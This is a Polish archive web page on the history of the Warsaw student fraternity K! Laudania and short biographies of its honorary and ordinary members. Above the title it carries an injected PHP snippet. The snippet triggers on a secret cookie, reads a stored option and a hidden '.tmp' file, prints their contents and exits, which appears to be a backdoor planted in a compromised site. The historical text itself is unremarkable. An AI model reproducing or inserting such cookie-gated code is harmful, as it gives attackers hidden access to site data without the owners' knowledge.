if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Laudania

Dekiel Laudanii - vide Poszukiwania. Nazwa:
Polska Akademicka Korporacja Laudania
Siedziba:
Warszawa
Data powstania:
15 XII (?) 1923 r.
Barwy:
brązowa – złota – czerwona
Dewiza:
„Per vias rectas - semperite”

Rys historyczny

Cyrkiel Laudanii.

Laudania powstała w grudniu 1923 r. Należała do tzw. korporacji chrześcijańskich. Z inicjatywy Laudanii w październiku 1924 r. K! Laudania, K! Mesconia oraz K! Lublinia powołały Zjednoczenie Polskich Akademickich Korporacji Chrześcijańskich. Wspólnym celem korporacji należących do Zjednoczenia było wychowywanie młodzieży akademickiej w duchu etyki katolickiej i tradycji narodowej. Obowiązywał zakaz pojedynkowania się. W 1928 r. w czasie uroczystości V-lecia nastąpiło poświęcenie sztandaru organizacji.

Szczególnym celem Laudanii była praca na rzecz umocnienia polskości na ziemiach wschodnich Rzeczypospolitej. Patronką korporacji została Matka Boska Ostrobramska, a za wzór stawiano rycerzy laudańskich. Wypełniając swoje cele statutowe Laudania przez wiele lat opiekowała się szkołą w Mizoczu na Wołyniu fundując nagrody dla uczniów, zbierając środki finansowe na bibliotekę oraz podarunki dla dzieci. Stworzyła także dwie biblioteki wędrowne dla Polskiej Macierzy Szkolnej. Koło Pań Laudanii ufundowało stypendium dla jednej uczennicy szkoły handlowej w Łucku.

Korporacja zawarła kartele: w dniu 8 XII 1927 r. z K! Pomerania z Poznania, w dniu 15 XII 1927 r. z K! Conradia z Wilna, a także z K! Korabia z Lublina.

Całkowita ustalona, fragmentaryczna imienna liczba członków obejmuje 10 nazwisk, w tym pięciu członków honorowych.

Brak wiadomości o powojennej działalności Laudanii i spotkaniach jej członków.

Uroczystości V-lecia Laudanii, Warszawa 1928 r.

Lista członków

Poniższa, niekompletna lista członków Laudanii obejmuje zaledwie 10 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Antoni Bogusławski, 1928 r.

 1. Antoni Bogusławski, (28 listopada 1889 w Warszawie- 31 sierpnia 1956 w Londynie) absolwent Gimnazjum gen. Pawła Chrzanowskiego w Warszawie (1909) oraz prawa na Uniwersytecie Montpellier, oficer Korpusu Polskiego w Rosji 1917-18, a następnie zawodowy oficer WP, uczestnik wojny polsko-bolszewickiej 1920, podpułkownik dyplomowany kawalerii, poeta, pisarz, tłumacz, wiceprezes Zarządu Towarzystwa Literatów i Dziennikarzy Polskich, od 1927 jeden z pierwszych sprawozdawców sportowych Polskiego Radia, Filister honorowy Laudanii 1927, w czasie II wojny światowej szef Cenzury Wojennej w Ministerstwie Obrony Narodowej, a następnie komendant Kwatery Prasowej, po wojnie na emigracji w Wielkiej Brytanii, prezes Związku Dziennikarzy RP na Uchodźstwie 1945-47 i prezes Związku Pisarzy Polskich na Obczyźnie, odznaczony m.in. Krzyżem Srebrnym Orderu Wojennego Virtuti Militari, Krzyżem Oficerskim OOP, czterokrotnie Krzyżem Walecznych, Krzyżem Komandorskim Orderu Świętego Sawy, Krzyżem Oficerskim Orderu Gwiazdy Rumunii, Krzyżem Kawalerskim Orderu Domowego pw. świętych Maurycego i Łazarza, Krzyżem Kawalerskim Legii Honorowej, pochowany na cmentarzu Old Brompton w Londynie

  Józef Chaciński, 1928 r.Józef Chaciński.

 2. Józef Chaciński, (13 marca 1889 w Warszawie - 6 maja 1954 w Górze Kalwarii) s. Antoniego i Adelajdy z d. Bloch, absolwent szkoły handlowej A. Jeżewskiego w Warszawie, matura Libawa 1913, student prawa w Szwajcarii, Kijowie, Warszawie, mgr praw, adwokat, ochotnik w wojnie polsko-rosyjskiej 1920, działacz społeczno-polityczny, dwukrotny prezes Stronnictwa Pracy (1920-22, 1927-28), poseł na Sejm II RP I i II kadencji w latach 1922–30, prezes klubu sejmowego w kadencjach 1922-27 i 1928-30, Filister honorowy Laudanii, w czasie II wojny światowej był w latach 1940–1942 więźniem niemieckiego obozu koncentracyjnego Auschwitz-Birkenau, członek Rady Jedności Narodowej, aresztowany 28 marca 1945 przez NKWD, został skazany w procesie szesnastu na 4 miesiące więzienia, w latach 1945-46 działał w Stronnictwie Pracy, po wojnie pracował jako radca prawny w Wydziale Polityki Budowlanej Zarządu Miejskiego w Warszawie

  Wacław Kneblewski, 1928 r.

 3. Wacław Kneblewski, (10 listopada 1887 w Lipiczach pod Turkiem - 21 października 1939 w Górnej Grupie) ks., red. red. “Rzeczypospolitej”, Filister honorowy Laudanii 1927, proboszcz parafii nieszawskiej 1932-39, założciel Ligi Stowarzyszeń Pol-Jugosłowiańskich w Polsce, odznaczony Orderem Korony Jugosłowiańskiej, aresztowany 21 października 1939 i zamordowany przez Niemców

  Karol Taylor, 1928 r.

 4. Karol Taylor, (1 listopada 1878 w Kielcach – 17 czerwca 1968 w Gdańsku) herbu własnego, s. Stanisawa i Marii z Różyckich, absolwent politechniki w Darmstadzie 1904, pracował we francuskich, rosyjskich i polskich wytwórniach silników spalinowych, od 1918 prof. i kierownik Katedry Silników Spalinowych, pierwszy dziekan Wydziału Mechanicznego PW, konstruktor silników spalinowych, m.in. brał udział przy projektowaniu pierwszego polskiego ciągnika rolniczego - tzw. ciągówki z Ursusa, Filister honorowy Laudanii, kurator Respubliki, po wojnie kierownik Katedry Silników Spalinowych 1945-59, pierwszy dziekan 1945-48 i prodziekan 1948-51 Wydziału Mechanicznego PG, pod jego kierunkiem opracowano pierwsze polskie silniki wysokoprężne dla rybołówstwa

  Marjan Trippenbach, 1928 r.

 5. Marjan Trippenbach, (1872 (?) - 30 kwietnia 1931) przemysłowiec, członek Komisji Rewizyjnej Komitetu Stołeczno-Wojewódzkiego, fundator domu akademickiego im. Marjana Trippenbacha, członek honorowy Bratniej Pomocy Studentów PW, Filister honorowy Laudanii, odznaczony złotą odznaką Kół Przyjaciół Akademika, zmarł śmiercią tragiczną, pochowany na warszawskich Powązkach

Członkowie rzeczywiści

 1. Jerzy Grübert, sekretarz sem. zim. 1926/27
 2. Tadeusz Kondracki, skarbnik sem. zim. 1926/27, prezes V-lecia 1928
 3. Stefan Szajewski, prezes sem. zim. 1926/27
 4. Wacław Tarnowski, pierwszy prezes 1923, olderman sem. zim. 1926/27, wiceprezes Komitetu Wykonawczego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1924-25, prezes Zjednoczenia 1928, wiceprezes Zjednoczenia 1931
 5. Antoni Żelichowski, wiceprezes sem. zim. 1926/27, sekretarz Prezydium Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1927

Listę członków opracowano na podstawie:

1) materiałów archiwalnych z Archiwum Korporacyjnego,
2) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Laudania.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 8 IX 2010 r.
Ostatnia zmiana: 20 VIII 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Akademicka Korporacja Laudania (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 20 VIII 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }